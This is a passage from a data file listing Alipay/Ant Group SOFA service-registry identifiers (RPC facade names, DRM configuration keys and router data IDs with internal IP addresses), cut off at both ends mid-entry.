inpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.voucher4AntFarmDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.service.impl.schedule.GroupBuyingTaskDRM.taskScanSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.variable.facade.VariableCalculateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.RuleAnalyzeDRMStrategy.useModifyCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.loadFromSingleDB,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finannafccore.common.service.facade.aoliao.api.BranchManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iexratecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.fc.common.lang.drm.AntBizLogCfgDrm.antEventMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.196.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.extend-request:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quotationcore.common.service.facade.api.quotation.QuotationDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:riskdatacenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.180.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.test.sub04:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:paymentmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.gmcommon.common.drm.GmCommonDrmValueResource.geoCityCodeWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.81.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditbill.facade.tag.api.PcreditBillAccountTagQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:supergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmngcore.common.service.facade.api.EnterpriseServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.mwalletmng.mmng.drm.FuCardDrm.dingTalkInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.53.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kborderprod.common.service.facade.api.order.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.engine.cert.client.facade.CertServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-fporgassetnet-schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.paramcore.common.service.manage.facade.api.internal.ParmTrunkDirectlyConfigWrapperFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.biz.tsure.facade.TsureDagTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpdcenter.facade.mng.DynamicFormMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianmerchant.common.service.api.Merchant3rdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:microloan_agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.feed.FeedGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.152.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.insbffwebTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbmall.facade.goc.GocSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.AuthFacade:1.0:antbuservice-global-antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchorder.orderdatacenter.facade.service.OrderDataRealtimeInfoQuerySpiFacade:1.0:isasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.trade.service.RepaymentPlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icertifycore.service.facade.api.CertQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtaskcenter.common.service.facade.taskevent.TaskEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:csoffline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelbs.common.service.facade.stepcounter.SportsStepSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.alsc.merchant.query.facade.api.store.AlscStoreSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdspcore.common.service.facade.callback.DispositionCallback:1.0:frastressDispositionCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.price.PriceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.claimoperation.common.service.ClaimAuditOpinionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","sofa_router_global_user_data_id#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@algox#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.unibase.common.service.facade.api.unimeta.UniMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbuservice.common.service.facade.manager.MenuManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:exratecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.51.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.217.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY@gfmdm#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.tss.coopr.common.service.callback.CooprCallback:1.0:emergencyCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_ACCTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.trsbrain.common.service.facade.spi.BizSelfCureServiceFacade:1.0:zskynet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.refund.RefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.FatigueQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.88.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:anteduprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsecu.common.service.facade.api.estimate.OfficialFundEstimateManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:antcloud_dx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_LILONG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.scheduler.common.service.facade.query.OperationRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sffcore.AppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grscore.common.service.facade.api.recruit.NewcomerTutorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linkede.fabricsrv.rest.DeployConfigRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inshealthprod.facade.LoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FINCOM_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-quotationcore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.opencore.service.facade.punish.AppPunishQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ordermng.common.service.api.order.NotifyInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.mwalletmng_mobileMysqlDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finannafccore.common.service.facade.risk.api.UserRiskTestDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_GFAC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finsupport.common.service.facade.serial.PosSerialNoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkanalysis.common.service.facade.relation.LimitCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.arc.job.processor.core.service.mng.PhysicalClusterManagement:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:inspect_sync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.handleCloudProcess,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.shop.ShopReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.taskflow.repo.YebcTaskConfigRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.MultiYebEteIncomeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aliyun.apsarabase.euler.resource.service.facade.api.ResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.ProductUspFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.hotevent.api.HotEventSubjectQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.match.api.MatchAppointmentStatModelQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@bizfund#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.finsupport:name=com.alipay.finnet.service.drm.ChannelFilterDRM.dbackDefaultPriority,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_ZHENGYUAN_DEV#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.biz.consultant.drm.ConsultantDRM.cacheSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.clientpublish.drm.ClientPublishDRMImpl.reserveBlackListDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.tradeexprodTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.itransferprod.service.facade.api.CardVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.metadata.api.BizDomainManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reservecenter.facade.api.MerchantInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyFillDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbgrouppurchaseprod.common.service.facade.group.GroupPurchaseGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductStatisticsStdFacade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayAssetCompositeDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.service.FeatureMetaQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dceptrans.config.cache.service.LocalCacheManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.actionrecord.TiredRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.7.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_P_FAS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.common.service.integration.calltronline.CallTROnlineMobilelbsClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.ImmuneRuleVisualizationCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necquery.common.service.transaction.FeeTransListQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.salesplan.SalesPlanInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.topic.topicDetailAutoDowngradableCards,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkpolicymng_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.timeline.endpoint.sofarest.NoticeSofaRest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.QueryNewsInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:rcdmncore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.deposit.api.DepositInstructionQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:tbapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.ApiresAppApiManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.AntPassTrustLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.blackbox.BbRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.loadNeedRemindSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.fileParseMaxMinute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.scene.StaticRefreshDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.facade.manage.api.ParmTaskOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xssClientPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingcore.common.service.facade.campaign.InsMktInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.QuestionTypeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.UserSceneCodeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_RCCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fraudmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fininfo:name=com.alipay.fininfo.biz.info.drm.PreControlDRM.exFinExchangeCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.prodmng.common.service.facade.channel.ChannelFeeRateOrgSummaryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmpcore.common.service.facade.AcceptanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_PORTAL_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.contentlib.common.service.api.content.qa.AnswerUpdateApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accountcore.common.service.facade.InvoiceNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mbill.common.service.facade.MbillVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.facade.guess.BackstageGuessInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.YebTradeOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.checkersdk.service.ChangeRiskDefenseService:1.0:checkruleexec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ropProcessCreateTaskCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchfund.common.service.facade.trans.api.BatchFileDownloadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.PermissionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundbankcore.common.service.facade.FundBankNoTradeInFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.comment.KbCommentQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.30.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofa4-demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenemng.common.service.facade.api.task.TaskTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcshield.common.service.facade.preeval.service.TaskManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.guardianWaterMark,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.191.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linke.aci.core.facade.CIJobAutoRetryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.item.MiniApp2ndBizItemConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.open.SaleActivityOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crep.request.Crep2PaiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:clientsc@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.report.common.service.facade.api.analysis.EventAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tool.MnotifyMessageResendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.v3.invest.InvestSortManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.biz.BizMetricAssertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.definriskcenter.facade.api.RiskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ProfileConfigService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:aims@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acticketcore.common.service.facade.CommonQuestionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imerchprod.ipaysales.facade.api.order.IpaysalesOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.publishing.common.facade.filter.PublishFilterApi:1.0:dataphin-publishing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.ryb.RYBUserAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:wealthapptwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.conf.TenantConfManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csmobile.servie.facade.api.BizBridgeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.StrategyOwnerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:miniselfop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_XINLINQI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcshield.common.service.facade.sceneconstruction.WhitelistAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.slip.SlipAdvanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.AuthenticationServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.CompScreenShotDownloadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:bxopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_PCCHK_DEDUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpgather@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchportalcore.common.service.feedback.facade.SpmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.callRecproxyFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.dwmas.common.facade.dclab.DclabAlgoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.opinioncore:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antprivacy.biz.service.api.ArchiveQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.AssetDecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opensupport.common.service.facade.support.repository.QaKnowledgeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:imaspmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExClientRateMonitorConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:xview@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.transfer.api.PointTransferBatchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.110.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instasset.common.service.integration.masterdata.result.code.ExchangeCodeMapQueryFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:insttrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finriskportal#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.unitestcenter.biz.dispatcher.service.SubTaskExecuteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fcratecenter.service.facade.api.FcSource